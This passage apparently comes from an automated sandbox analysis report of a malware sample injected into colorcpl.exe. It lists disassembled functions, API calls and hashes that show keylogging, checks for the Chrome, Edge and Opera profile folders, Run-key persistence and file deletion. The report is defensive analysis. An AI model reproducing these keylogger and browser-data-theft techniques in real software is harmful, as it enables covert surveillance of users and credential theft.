                                                                                                                                • Part of subcall function 0466B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0466B172
                                                                                                                                • Part of subcall function 0466B164: wsprintfW.USER32 ref: 0466B1F3
                                                                                                                                • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0466B0B4
                                                                                                                              • UnhookWindowsHookEx.USER32 ref: 0466B0C7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                              • String ID: Online Keylogger Stopped
                                                                                                                              • API String ID: 1623830855-1496645233
                                                                                                                              • Opcode ID: f980ac997f589e90b930f7579f7ec506e9d3c33f82150cd91dda30316cc64dab
                                                                                                                              • Instruction ID: 5cc414a76efddf3a5c9282e667f9682d2555aa72f6d06d2db91fdca933cefc7e
                                                                                                                              • Opcode Fuzzy Hash: f980ac997f589e90b930f7579f7ec506e9d3c33f82150cd91dda30316cc64dab
                                                                                                                              • Instruction Fuzzy Hash: C4017B30A04214ABEB31BB38D81A3BEBFB49F42604F40005CD547026C5FB613859DBDA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06724498 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID: $G
                                                                                                                              • API String ID: 269201875-4251033865
                                                                                                                              • Opcode ID: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                                                                                                              • Instruction ID: d10e12438c2daecfd4c5e74bddbdaa91b65418eaf1275828b152dfc8f13d1a54
                                                                                                                              • Opcode Fuzzy Hash: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                                                                                                              • Instruction Fuzzy Hash: 1EE06512E0193355A7F56A7AFE0C76A05C99BC1275F118326E734961C8DF74444181A6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0466C4F6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExistsFilePath
                                                                                                                              • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                              • API String ID: 1174141254-4188645398
                                                                                                                              • Opcode ID: e699c24b0d09aef1b859c15b1f3c2153314f03406e97477ee814e50545344655
                                                                                                                              • Instruction ID: 6ce6efb52c4ac810ebf7dbb1053fc8f3ee7a837fec31cc361b8e77ef7330634c
                                                                                                                              • Opcode Fuzzy Hash: e699c24b0d09aef1b859c15b1f3c2153314f03406e97477ee814e50545344655
                                                                                                                              • Instruction Fuzzy Hash: 44F08271A0431997DB04B7B8DC1A8FE7B6CDE10605B40001DA90392181FF60BD46CAE9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0466C559
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExistsFilePath
                                                                                                                              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                              • API String ID: 1174141254-2800177040
                                                                                                                              • Opcode ID: 10bdbb108ec9c4e62ba96837fa41f3396ceadd6304a878dc9c5645c97da5ed24
                                                                                                                              • Instruction ID: b81fc1ea2e7b216e30604e18f350e056937da6208bb76f206e12208da204f787
                                                                                                                              • Opcode Fuzzy Hash: 10bdbb108ec9c4e62ba96837fa41f3396ceadd6304a878dc9c5645c97da5ed24
                                                                                                                              • Instruction Fuzzy Hash: 7DF08271A0431997DB14B7B4DC168FE7B6CDE11615B00001EA90392180FF60BD46CAF9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0466C5BC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExistsFilePath
                                                                                                                              • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                              • API String ID: 1174141254-1629609700
                                                                                                                              • Opcode ID: 6bc8692913245638a8d9feabc8ec6b6ce6afe57ad7e460f8978b675dac24acba
                                                                                                                              • Instruction ID: 10989f258d22f52a3144699bb2095f0c940e02a2e6cb181cd18f54b38d06ca46
                                                                                                                              • Opcode Fuzzy Hash: 6bc8692913245638a8d9feabc8ec6b6ce6afe57ad7e460f8978b675dac24acba
                                                                                                                              • Instruction Fuzzy Hash: D0F05871A4431997DA04B7A4DC5A8FEBBACDE10605B40002EA903A2180FE60B9468AE9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 067244F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID: $G
                                                                                                                              • API String ID: 269201875-4251033865
                                                                                                                              • Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                                                                                                              • Instruction ID: 178c1458b6aebbcc08e771afe0ab7ffa4f012e5638de6954fa1185f6a71140ab
                                                                                                                              • Opcode Fuzzy Hash: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                                                                                                              • Instruction Fuzzy Hash: 36E0ED26A0543209A6FA663EFE4C6AA0AC98B81231F118327E678871C8DFA4448180A6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetKeyState.USER32(00000011), ref: 0466B64B
                                                                                                                                • Part of subcall function 0466A3E0: GetForegroundWindow.USER32 ref: 0466A416
                                                                                                                                • Part of subcall function 0466A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0466A422
                                                                                                                                • Part of subcall function 0466A3E0: GetKeyboardLayout.USER32(00000000), ref: 0466A429
                                                                                                                                • Part of subcall function 0466A3E0: GetKeyState.USER32(00000010), ref: 0466A433
                                                                                                                                • Part of subcall function 0466A3E0: GetKeyboardState.USER32(?), ref: 0466A43E
                                                                                                                                • Part of subcall function 0466A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0466A461
                                                                                                                                • Part of subcall function 0466A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0466A4C1
                                                                                                                                • Part of subcall function 0466A636: SetEvent.KERNEL32(?,?,00000000,0466B20A,00000000), ref: 0466A662
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                              • String ID: [AltL]$[AltR]
                                                                                                                              • API String ID: 2738857842-2658077756
                                                                                                                              • Opcode ID: 195cbe983fcfd81b84c6093284e015572000b0c42aad28a5c866f8771dfec7d1
                                                                                                                              • Instruction ID: b7c14fa5b414aa44f76cd5c9834316910950ca502bd94e695e4f3df2621808f3
                                                                                                                              • Opcode Fuzzy Hash: 195cbe983fcfd81b84c6093284e015572000b0c42aad28a5c866f8771dfec7d1
                                                                                                                              • Instruction Fuzzy Hash: 56E0D831B00231939968377DE92E6BD3E51CB43E54B81014DE483EB784FD8A7D5543DA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetKeyState.USER32(00000012), ref: 0466B6A5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: State
                                                                                                                              • String ID: [CtrlL]$[CtrlR]
                                                                                                                              • API String ID: 1649606143-2446555240
                                                                                                                              • Opcode ID: 078a94830063922f4ef9d168be20f47e1ccd08ab1c27c3a01e64b804e133af9d
                                                                                                                              • Instruction ID: c4ddd603f0ed1dc2f63b63f1899ef46d4ecc7660b5e5e790d773b8660c6ce3d7
                                                                                                                              • Opcode Fuzzy Hash: 078a94830063922f4ef9d168be20f47e1ccd08ab1c27c3a01e64b804e133af9d
                                                                                                                              • Instruction Fuzzy Hash: 54E0CD31F0423193CB34363D9A1E67C2E10CB52E54F41015DF443C7685FD86791147CA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04673A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0466D144,00000000,046D52D8,046D52F0,?,pth_unenc), ref: 04673A31
                                                                                                                              • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 04673A45
                                                                                                                              Strings
                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 04673A2F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteOpenValue
                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                              • API String ID: 2654517830-1051519024
                                                                                                                              • Opcode ID: 2d3baf9023afbe6ddbf3f2677251954d6e5689def8b62edb5d721b85ab8967fb
                                                                                                                              • Instruction ID: 67165447c81411a8111b717771e98268deb2841c81f4d3920b770d008c2ea679
                                                                                                                              • Opcode Fuzzy Hash: 2d3baf9023afbe6ddbf3f2677251954d6e5689def8b62edb5d721b85ab8967fb
                                                                                                                              • Instruction Fuzzy Hash: 2AE0127165420CBBDF104E71DD07FBA776CDB01B41F105298BB0692181E6669E99E6A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 066EF4AB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0671547C: __onexit.LIBCMT ref: 06715482
                                                                                                                              • __Init_thread_footer.LIBCMT ref: 066F1C35
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Init_thread_footer__onexit
                                                                                                                              • String ID: ,kG$0kG
                                                                                                                              • API String ID: 1881088180-2015055088
                                                                                                                              • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                                                                                                              • Instruction ID: 7f34462661c414b5c3b4ce9cb23299f9d082ddfcc5d6fde0ef72df5bb4aeecc3
                                                                                                                              • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                                                                                                              • Instruction Fuzzy Hash: 64E0DF35524920CFD3D8B37CDE8499877D1DB4B320B61802BEB24EA3C0CB2964428EAD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0466B876
                                                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0466B8A1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteDirectoryFileRemove
                                                                                                                              • String ID: pth_unenc
                                                                                                                              • API String ID: 3325800564-4028850238
                                                                                                                              • Opcode ID: c1b5714707efdd81a28c1e086fa251489c3c95782056ac14315f033c71baaab8
                                                                                                                              • Instruction ID: 4fcd24385f1a425fd87056d07b6ff7fbd45f901a2433ea63221ad9830c5a1e58
                                                                                                                              • Opcode Fuzzy Hash: c1b5714707efdd81a28c1e086fa251489c3c95782056ac14315f033c71baaab8
                                                                                                                              • Instruction Fuzzy Hash: EFE08C715106108BEB14AB34C858AD6339CEF2121AF00440ED493D3240FF38FC4DCAA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04672850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0466F8C8), ref: 04672860
                                                                                                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 04672873
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ObjectProcessSingleTerminateWait
                                                                                                                              • String ID: pth_unenc
                                                                                                                              • API String ID: 1872346434-4028850238
                                                                                                                              • Opcode ID: 8bd785a2ba4efeccb130c9f23445c2ab1b5be4e3c78cf5b96f841f0c117e6a10
                                                                                                                              • Instruction ID: 3b29d1940f134944c2e091105b46fd6cb31a7a17555e38d8996092f118339911
                                                                                                                              • Opcode Fuzzy Hash: 8bd785a2ba4efeccb130c9f23445c2ab1b5be4e3c78cf5b96f841f0c117e6a10
                                                                                                                              • Instruction Fuzzy Hash: CFD0127499A216AFDB350B60ED98B043B98EB06326F142286F522512F0E77D4C58EAA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A0C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,04661D55), ref: 046A0D27
                                                                                                                              • GetLastError.KERNEL32 ref: 046A0D35
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 046A0D90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1717984340-0
                                                                                                                              • Opcode ID: 54597969827ea5c6b9b4b61045b14910578e6b94e85d146e0e2e9a2055e393d9
                                                                                                                              • Instruction ID: d2140c7a987c008b0ef75179cab5f9379af2a275a4ae38ac8b1c6e533b0df382
                                                                                                                              • Opcode Fuzzy Hash: 54597969827ea5c6b9b4b61045b14910578e6b94e85d146e0e2e9a2055e393d9
                                                                                                                              • Instruction Fuzzy Hash: CD41F936600A15AFDF21AF65C8447BA7BA8EF11310F14415EE8555B391FB70BD61CF50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04671B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,04671EF0), ref: 04671B8C
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000014,04671EF0), ref: 04671C58
                                                                                                                              • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04671C7A
                                                                                                                              • SetLastError.KERNEL32(0000007E,04671EF0), ref: 04671C91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4100373531-0
                                                                                                                              • Opcode ID: b0539f197742e8bd696b10ccd15dd8c872b4c51e58ebbb2941ea9796ff324716
                                                                                                                              • Instruction ID: 883fa9b96b18c4115edcb4b166cad59a4cbe523feaa58ba852f404ff61da5833
                                                                                                                              • Opcode Fuzzy Hash: b0539f197742e8bd696b10ccd15dd8c872b4c51e58ebbb2941ea9796ff324716
                                                                                                                              • Instruction Fuzzy Hash: 514178B52043059FE7248F98D984BA6BBE8FF49714F04042EE98A86751FB39F909CB51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%